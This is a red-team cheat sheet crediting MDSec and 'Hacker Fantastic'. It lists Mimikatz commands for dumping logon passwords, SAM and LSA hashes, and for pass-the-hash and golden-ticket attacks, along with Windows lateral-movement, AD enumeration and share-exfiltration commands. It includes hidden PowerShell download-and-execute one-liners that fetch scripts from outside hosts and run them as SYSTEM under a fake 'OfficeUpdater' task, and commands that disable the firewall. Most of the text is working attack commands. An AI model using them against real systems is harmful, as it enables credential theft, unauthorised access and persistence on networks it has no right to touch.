```
d8,
                          d8, d8b
                                               48P
           `8P
                          `8P
                             ?88
                              88b
                                            d88888P
           88b 88bd8b,d88b
                          88b 888 d88' d888b8b
                                              ?88' d88888P
 88P'`?8P'?8b 88P 88P'`?8P'?8b 88P 888bd8P' d8P' ?88
                                              88P
                                                    d8P
485
                                              88b
d88' d88' 88bd88' d88' d88'
                                              `?8b d8888P'
                  ++ mimi-katz cheat-sheet ++
```

https://github.com/gentilkiwi/mimikatz

General Usage

```
modulename::commandname arguments
log <filename> - enable logging to mimikatz.log or <filename>
base64 - disable file writing and output to console files in base64
type :: only for a list of known modules.
type a module without commandname for help e.g. crypto::
type ! before modulename to get SYSTEM, e.g. !privilege::debug
```

Command Help

```
privilege::debug - obtain DEBUG privileges
sekurlsa::logonpasswords - obtain all logon passwords
sekurlsa::pth - pass the hash module
sekurlsa::tickets - Kerberos tickets
sekurlsa::ekeys - Get keys (e.g. aes256)
sekurlsa::kerberos - smartcard PIN's
kerberos::ptt - pass the ticket
kerberos::tgt - Shows TGT session information
kerberos::list /export - export all tickets on host to files (for ptt)
kerberos::purge - clear all tickets for session
lsadump::sam - dump SAM
lsadump::secrets - dump secrets
lsadump::cache - dump MS-cache logons
lsadump::lsa - LSA query tools
token::whoami - show token
token::list - show all tokens
token::elevate - elevate to SYSTEM (! shortcut)
token::revert - revert to original self
ts::multirdp - patch TerminalServices to allow multi-user sessions
(unstable)
```

Useful Modules

```
process:: - process management
event:: - event management
service:: - service management
net:: - net.exe
misc:: - command exec, detours hooking, misc stuff.
token::revert - revert to original self
ts::multirdp - patch TerminalServices to allow multi-user sessions
(unstable)
```

Pass-The-Hash Example

```
sekurlsa::pth /user:Administrator /domain:<Full domain>
/NTLM:<NTLMhash> /run:<CMD to run> - optional for 2008r2 &
above/aes128:key /aes256:key
<CMD to run must be in " and additional arguments \">
```

Golden-Ticket Example

```
kerberos::golden /domain:<full domain> /sid:<domain sid>
/user:<username> /krbtgt:<NTLM hash krbtgt user>
- Generates a "ticket.kirbi" file, valid for 10 years to access the account specified.
Use with "kerberos::ptt <filename>
If using beacon you must spawn a new beacon to make use of privileges.
If using domain admin ticket you can validate with "dir \\pdc\C$" or similar.
```

LSA Dump Example

```
lsadump::lsa /patch - patch LSA and dump hashes
lsadump::lsa /inject /name:krbtgt - inject and dump LSA details
```

Volume Shadow Copy Example

```
Get SYSTEM and SAM hives from host, either with

reg save HKLM\SYSTEM SystemBkup.hiv

reg save HKLM\SAM SamBkup.hiv

or use vss-own.vbs to make a volume shadow copy and access:
c:\windows\system32\SAM
c:\windows\system32\SYSTEM

lsadump::sam SystemBkup.hiv SamBkup.hiv
```

7	_v_	_v_	77	77		7	7		77		\ 7			77	77		7
					_		- 1			7			_			_	
							- 1										
							- 1		1.1	!							
!			!!	!!	!	!	!	!	!!		!!	!	!	!!	!!	!	!

Tips & Tricks for Windows Remote Administration

WMIC

```
wmic /node:<targetIP> /user:<username> /password:<password> process
call create "cmd.exe /c <command>" - execute command on remote host
wmic /node:<targetIP> /user:<username> /password:<password> process
call create "cmd.exe /c <command> >> \\YourIp\Share\output.txt" -
redirect STDOUT to UNC path

wmic /node:10.0.1.1 /user:LANNISTER\avservice /password:RrTXshEN
process call create "cmd.exe /c c:\\runme.bat"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
    ProcessId = 3368; <-- This indicates Success!
    ReturnValue = 0;
};</pre>
```

WinRM

```
winrs /r:<hostname> /u:<user> /p:<password> <cmd>
```

Task Scheduler Service

```
net time \\<host>
schtasks /CREATE /S \\<ip> /U <user> /P <password> /tn <taskname> /tr
<cmd> /sc ONCE /st <24:00 time> /SD <DD/MM/YYYY>
... wait for task to run ...
schtasks /DELETE /tn <taskname>

E.g. (using current creds or pth)
schtasks /CREATE /S \\10.0.1.2 /tn prdelka /tr
"c:\windows\system32\rundl132.exe c:\exploit.dll DllMain,1" /sc ONCE
/st 12:00 /SD 18/11/2015

Download & Exec PowerShell
schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -Nonl
-nop -c 'IE ((new-object
net.webclient).downloadstring("http://server/script.ps1"'))'" /sc
onlogon /ru System
```

```
Deprecated
net time \\<host>
at \\<host> <24:00 time> /interactive "cmd"
```

Service Manager

```
Can also be used remotely with sc.exe \\<ip> <cmd> as below sc queryex - list services sc qc <service> - query service config (shows logged on user). sc stop/start/pauce/continue <service> - stop/start/pause/continue service sc control - send CONTROL B to service (use after continue) sc config VulnService binpath="c:\lol.exe" - reconfigure vulnerable services sc enumdepend <Service> - list service dependancies sc \\<ip> create <serv> binpath=c:\blah.exe start=auto - create remote service
```

General Administration

```
Disable Firewall
netsh firewall set opmode disable
Enable Terminal Services
reg add "HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG DWORD /d 0 /f
net start "termservice"
Download & Exec
schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -Nonl
-nop -c 'IE ((new-object
net.webclient).downloadstring("http://server/script.ps1"'))'" /sc
onlogon /ru System
Download & Exec (w/Proxy!)
powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -
noprofile -c $wc=New-Object
System.Net.WebClient; $wc.Proxy.Credentials=[System.Net.CredentialCache
]::DefaultNetworkCredentials;IEX
$wc.DownloadString('http://10.0.0.250/a');"
Download File
powershell -w hidden -exec bypass -nop -c "(New-Object
System.Net.WebClient).downloadfile('http://www.microsoft.com/favicon.i
co','output.ico')
```

Windows Enterprise

```
Domain Query
net users /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
Domain Trusts
nltest /domain trusts - show all domain trusts
nltest /dcname:<domain name> - identify PDC
netdom - verify two-way trusts
dsquery * -limit 0 - dump entire AD information
dsquery user "cn=users,dc=dev,dc=test" - dump users
dsget group "cn=Domain Admins, cn=users, dc=dev, dc=test" -members -
dsget user "cn=john,cn=users,dc=dev,dc=test" -memberof - user group
Computers & Servers
net view /domain:<DOMAIN>
net view \\<hostname>
srvinfo \\<hostname>
sc \\<hostname>
nbtstat -A <hostname>
net group "Domain Computers" / DOMAIN
```

PowerView

```
Get-NetForest - show forest

Get-NetForestTrusts - show forest trusts

Get-NetForestDomains - show forest domains

Get-NetDomainTrusts - show domain trusts

Powerview can run with a -Domain <domain> argument with most Cmdlets

Invoke-MapDomainTrusts

Invoke-Netview - powerview version of netview.exe

Invoke-UserHunter - queries AD and also all machines

Invoke-StealthUserHunter - query only AD and less noise

-CheckAccess flag can be used to test Admin rights.

Get-UserLogonEvents (find users logged on from host.)

Invoke-UserEventHunter - find users in event logs
```

Shares & Data Exfilitration

```
net use \\<ip> /user:DOMAIN\username password
```

net view \\<ip>
dir /s \\<host>\SHARE - recursive search
dir /s /Q /O:-D /T:A \\<hostname>\SHARE - find files
xcopy /s /E \\<host>\SHARE\dir c:\blah - Xcopy recursively files &
Folders
NetSess.exe - query for user logged on location
netview.exe - tool that performs many of the above tasks for you.
adfind.exe - tool to search AD.



This handy compilation of useful hacking tricks & tips for the discerning gentle person is bought to you by the number 0 and the letters w, n, e and d. No My Little Ponies were harmed in the creation of this content. Merry Christmas & a Happy New Year from Hacker Fantastic & the team at MDSec.

